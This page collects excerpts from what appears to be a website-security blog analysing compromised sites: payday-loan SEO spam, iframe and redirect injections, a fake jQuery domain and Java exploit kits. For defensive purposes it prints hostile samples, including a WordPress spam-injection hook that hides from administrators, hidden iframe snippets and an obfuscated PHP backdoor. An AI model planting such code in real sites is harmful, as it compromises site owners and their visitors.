Mass WordPress Brute Force Attacks? – Myth or Reality

We are seeing in the media some noise about a large distributed brute force attacks against all hosts targeting WordPress sites. According to reports, they are seeing a large botnet with more than 90,000 servers attempting to log in by cycling different usernames and passwords against the WordPress access points: /wp-login.php and /wp-admin.

This got us thinking, well we block a lot of attacks why not look at the logs to see what they tell us. So we did.

The Data

Looking back, we can see in our historical database the following:

2012/Dec: 678,519 login attempts blocked

2013/Jan: 1,252,308 login attempts blocked (40k per day)

2013/Feb: 1,034,323 login attempts blocked (36k per day)

2013/Mar: 950,389 login attempts blocked (31k per day)

2013/Apr: 774,104 for the first 10 days – 77,410 per day


Read More

When Good Plugins Go Bad – SEO Spam on Joomla Websites

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.


Read More

Payday Loan Spam affecting Thousands of Sites

One of the most important metrics used by search engines to rank a site is the number of link backs that it has. The more links a site has for a specific keyword, the higher it will rank when someone searches for it. So if a site has a lot of links back for a keyword (say “loan”), if someone searches for “loan” it will rank very high.

That’s where SPAM SEO (Search Engine Optimization) comes int play. Instead of building content and growing a site to organically receive links back, criminals (yes, anyone that hacks someone’s else site for monetary gain is a criminal) will hack into websites and inject links that will target specific keywords.

Those links will then point to a website controlled by the attacker[s] that they want to have better ranking. Very often those links are conditional (only displayed for search engine bots) and hard to detect without a specialized scanning tool.

Payday Loan Spam

We see all types of SPAM, the most common used to be about pharma products (like Viagra  or Cialis), Cassinos online and pornographic pages. Lately, however, we have started to see a sharp increase in the number of sites injected with payday loan and money borrowing services.

The SPAM in it of itself once displayed is very simple, all it does is add a hidden link to a site to offer loans. Similar to:

<a href="httx://payday-all.co.uk/” title="Pay Day Loans Uk”>pay day loans uk</a>

When Google (or Bing) visits the compromised site it will see the link to payday-all.co.uk and increase the PR (page rank) for payday-all.co.uk. As more sites get infected and linking to payday-all, the better it will rank for keywords like “UK Pay day loan”.

Note that this type of spam is not new and we first blogged about it last year: Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla, explaining how they were being hidden inside WordPress sites.

Over the past year, this campaign continues to grow and evolve and their techniques have also matured.

Payday Loan Spam – The domains

Most of the payday spam we are tracking seems to end in one of the following domains (by a company called Cash Advance Online or Pay Day Online):

http://paydayloansyouknow.com.au/ (216.172.52.62)
http://paydayloanstores88paycheck.com/ (216.172.52.62)
http://quickcashnowgjyourself.com/ (216.172.52.64)
http://getin10minpaydayloans.com/ (216.172.52.64)
http://cheappaydayadvancevcadvanc.com (216.172.52.64)
http://cashadvancelocationsndbusiness.com (216.172.52.64)
http://findcashadvancefor.me/ (216.172.52.63)
http://findcashadvancenow4.me/ (216.172.52.64)
http://paydayloanlendersxocomprehensive.com/ (216.172.52.60)
http://personalcashloans64long.com/ (216.172.52.67)
http://loanstillpaydayncwith.com (216.172.52.67)
http://kopainstallmentpaydayloansonline.com (216.172.52.67)
http://ukropinstantloans.com (64.191.79.185)
http://pincashadvance.com (64.191.79.185)
http://perapaydayloansonline.com (64.191.79.185)
http://kopainstallmentpaydayloansonline.com/ (64.191.79.185)
http://loronlinepersonalloans.com/ (50.115.172.170)
http://inapersonalloans.com/ (50.115.172.24)
http://paydayloans10dokp.com/ (109.206.176.120)
http://paydayloans10tilp.com/ (173.214.248.102)
http://paydayloans10ukhw.com/ (173.214.248.100)
http://paydayloansthis.com/ (109.206.176.19)
http://www.payday-hawk.co.uk/ (184.173.197.237)
http://paydayloansfromnowon.com/ (109.206.176.11)
http://cash-loans247.co.uk/ (37.1.209.107)
http://payday-all.co.uk/ (37.1.209.107)

Here are some quick stats on the IPs above:

109.206.176.11	1
109.206.176.120	1
109.206.176.19	1
173.214.248.100	1
173.214.248.102	1
184.173.197.237	1
216.172.52.60	1
216.172.52.62	2
216.172.52.63	1
216.172.52.64	5
216.172.52.67	3
37.1.209.107	2
50.115.172.170	1
50.115.172.24	1
64.191.79.185	4

and

109.206.176	3
173.214.248	2
184.173.197	1
216.172.52	12
37.1.209	2
50.115.172	2
64.191.79	4

Their templates all look the same, they try to convince the user to sign up and register with them to be pre-approved for a loan. This is the common landing page for Cash Advance Online:

Cash spam

And this is the template for Pay Day Online:

Spam cache 2

As you can see, a good and clean designed page trying to convince the user to sign up. What’s scary is the number of sites linked to them. If you do some searches on Google for the specific keywords they use:

“payday loans massachusetts” OR
“payday loan bad credit” OR
“business cash advance loans” OR
“No Fax Payday Loan”

You will find hundreds of thousands of pages linking to them. All from unrelated sites ranging from personal blogs, government sites, forums and universities.

Applying for a loan

After seeing so many sites with this spam, I felt compelled to see if can get a loan. So, I decided to try a few of them to see what would happened.

First, I filled the form that asked for a lot of personal information (Name, Address, email, Social security number, Bank information, etc). All of them denied me and redirected me to altohost.com, which in turn redirected me again to lenditfinancial.com.

http://getin10minpaydayloans.com/apply ->
https://altohost.com/system/thank.you.page/click.php?id=2610 ->

https://www.lenditfinancial.com/newcode/step2.php?referid=T3

Altohost is part of t3leads.com (affiliate marketing/tracking), so it seems the attackers are building this network of spam sites to redirect users to legitimate payment companies that offer affiliate commission (lendit Financial). Always about the money.

Payday Loan Spam – The hiding spot

As we said before, most of the spam is conditional, so a normal user visiting the site won’t see them. Only search engines (like Google or Bing) will see the malicious links added there. In addition to being conditional, the spam is also hidden via javascript. So if you are using a browser with javascript enabled, the spam will not show up.

This is the javascript used to hide the spam (that is also flagged by sitecheck):

SPAM seo push

And the attackers to do not stop there. On a WordPress site, they add the following piece of code (or similar) to inject the spam:

function b_call($b) {
if (!function_exists(“is_user_logged_in”) || is_user_logged_in() || !($m = get_option(“_metaproperty”))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace(“~<body[^>]*>~”, ‘\\0′.”\n”. $n .”\n”, $b);
$b = str_ireplace(“</head>”, $m.”\n</head>”, $b);
return $b;
}
function b_start() {
ob_start(“b_call”);
}
function b_end() {
ob_end_flush();
}
add_action(“wp_head”, “b_start”);
add_action(“wp_footer”, “b_end”);

Which will hide the code from anyone that is logged in (administrators of the site) and only display to the others. The spam content is also hidden inside the _metaproperty option inside the wp_options table.

The code changes at each new cycle of the spam, but the idea is the same. Make it harder for the owner of the site to detect and at the same time display the spam links to search engine bots.

Who is behind

It is very hard to point a specific organization or person responsible for those spam injections. The whois from all the domains is hidden and they seem to use quite a range of IP addresses. From our tests, they are pointing to affiliate links to try to make commission money from legitimate companies. So the only real way to track them is going after the legitimate lending companies and track who they are paying the money to.

Large Scale Compromises Leading to Traffic Distribution System

For the last few weeks we’ve been tracking a large scale decentralized Traffic Distribution System (TDS). It’s using hundreds of compromised sites as their first entry point. Anyone that visits the compromised sites from a search engine gets redirected to another site controlled by the attackers (most of the time with pornographic or pharmaceutical content).

For each of those redirections, the bad guys make money via affiliate commissions. Symantec explains well how those traffic distrubution systems work here: Web-Based Malware Distribution Channels: A Look at Traffic Redistribution Systems.


Read More

Malware Redirection with a Delay

You visit a site and it looks good and clean. However, if you keep the page open, after maybe 20-30 seconds, you get redirected to a casino or pharma affiliate page. What is going on?

We call these delayed redirections and they are becoming more prevalent these days. Instead of injecting malware, or performing redirections via javascript, the attackers are adding the refresh option to the HTTP headers. Similar to the following:

HTTP/1.1 200 OK
Date: Tue, 29 Jan 2013 17:18:02 GMT
Server: Apache
Refresh: 25; url="httx://www.dodonet.biz"


Read More

Server Compromises – Understanding Apache Module iFrame Injections and Secure Shell Backdoor

There are many ways to inject a malicious payload onto a website. The attacker can modify any of the web files (index.php for example), the .htaccess file or php.ini (if the site is using PHP). There are other ways, but those are the most common methods, specially on shared hosts.

However, for the last year, we started to see a new way to inject malware on compromised servers via a malicious Apache module. We posted about it before and it has been covered on many other mediums. After a few months of tracking them, and working on multiple servers that had this issue, we want to share a bit of what we have learned.

Identifying the injection

First, a good way to identify if an infection is coming via the Apache module compromise is by looking at how the iframe is being inserted. They seem to always follow this pattern:

<style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframe
src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div>

or

<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <div class="q6umct6stl”><iframe
src="httx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div>

The domain name changes very often (IP is often 62.75.235.48), as does the div class name and the iframe sizes. These are some of the domains we have tracked:

Read More

Web Malware – Working with Evil Backdoors – Part III

The most complicated part of our job, when cleaning compromised web sites, is ensuring we find all backdoors. If we miss one, the site can be reinfected. We have done a few posts about backdoors already, explaining how they work and in them provide example of what they are and look like:

However, despite being a very complicated task, most people still think that removing backdoors consist of searching for eval’s, base64_decode and similar keywords. While that will find some, it’s not highly effective.

Ugly Backdoor

Today, we will present you the BACKDOOR:UGLY:13 (yes, that’s how we name it). It is a code we are finding on WordPress/Joomla sites compromised with SEO Spam to allow the attackers to reinfect and reinject spam code:

<?php
$P81J5DkwYm=’CQWnk4mSgxD’^apC4zA_i;$Oq9E1Iip7=ouw&’o}=';$qkit=’&=’.HZ^’IX=+=-‘;’nyD’.
‘?';$ywO_bGCvD=’H]’.pTZYkh.'<G}FC’&hTXXRlZLrO.'[{g';$eBwDr2V=#w50jH83IO7′.
‘ ,|:F-2>1u@:”‘.qgQ1.'<*’^EMR.'”@’.tKU2.’$Ln&)(hkx';$Arb=’>8a’^Mb9;’Tpr’.
‘rH-AhDxq';$Wt0cI9t='(h9’|’}.}';$ON_=eftg.’/l’|F3FDez;$koJhZ=’}’.v.#CF0′.
‘.=8l`5’&’RVN]m.l}z^H>';$QgYL=’ “.’.DAMT.’%#Q’|’ $+(<TH@T-#A';$GDWkPb=’@*’.
‘%DxM”g#’.HCId.’@^’.ItSA^’xW^sN}@’.OR05.’|Jq./F8|';$g1MRqXRy=$Oq9E1I&/*_Ikm’.
‘Uv*/$Wt0cI9t;$Db_3w=$ON_&$qkit;$_izus6=$koJhZ^$QgYL;$gMYmjr=(‘@)+G)F”N#2$t’.
‘$p4″W-,’|’0!&c`v!,0>4$OP0 f#p’)^$GDWkPbCn5;$DP7=(‘5$ C1=”E+c.’.g27mr.#DfTy’.
‘%!’.r0x66.'<22@5x’|’!4(2rc>`3a?!73 ‘.cH9a.’$`<34(“y+P’)&(‘{jWR%O.%1m^R%-<B’.
‘f?W@[#q{];’.ZpqKKG^’J_!’.VG.'[U9%XZ@}’.YJf5.’&LDF$’.MaFIt.'<p’);$niZllS=(#’.
‘{/7p”‘.fjlb.’ =i,’^';os0}>?,Qd{(l’)|$_bGCvD;if($g1MRqXRy($Db_3w(/*BZKHhHPA’.
‘6X$eO*/$gMYmjrlJc))==$DP7)$_izus6((‘=[M{]~o~m}’&’~_W9}>’.iyem),$Db_3w(/*y3′.
‘n*/$niZ),$eBwDr2V.$ArvQhb.(‘lv^9{p’^'”C<T6M’));#medAQT)W(Azd-,JG ?f.Er?2R’.
‘z-YAYBxK:@x#4St%.q+_H5^P(XB|+leP9f-{1f';


Read More

Sorryforthiscode – iFrame Injection

We were working on a compromised site today that had some hidden iFrames on it. The iFrames were redirecting visitors to what seemed like random domains. This is the iFrame we were seeing:

<iFrame src="httx://directs016. ru/in.cgi?wal" width=1 height=1 ..

Sorryforthiscode

Nothing new, but we decided to check how popular it was, and we were able to detect a few other sites with it. After a while the iFrame being injected changed and as we continued to track it, we noticed that it was changing every few hours. Here are some of the domains used up in the last few days:

Read More

Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( jquery-framework.com ), since it looks like a valid site.

jquery-framework.com

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..


Read More

Compromised Websites Hosting Calls to Java Exploit

Remember that Java 0 day vulnerability that was discovered a few weeks ago and took a while to get patched by Oracle? You know, the one that caused a large portion of the security community to recommend everyone to disable Java completely in their browsers?

Java Exploits

Well, it wasn’t hype. This vulnerability has been exploited since then, and now it’s the #1 vulnerability exploited by newer exploit kits found on compromised websites. The detection rate is also very low by AntiVirus products (7 out of 42 on Virus total):

Read More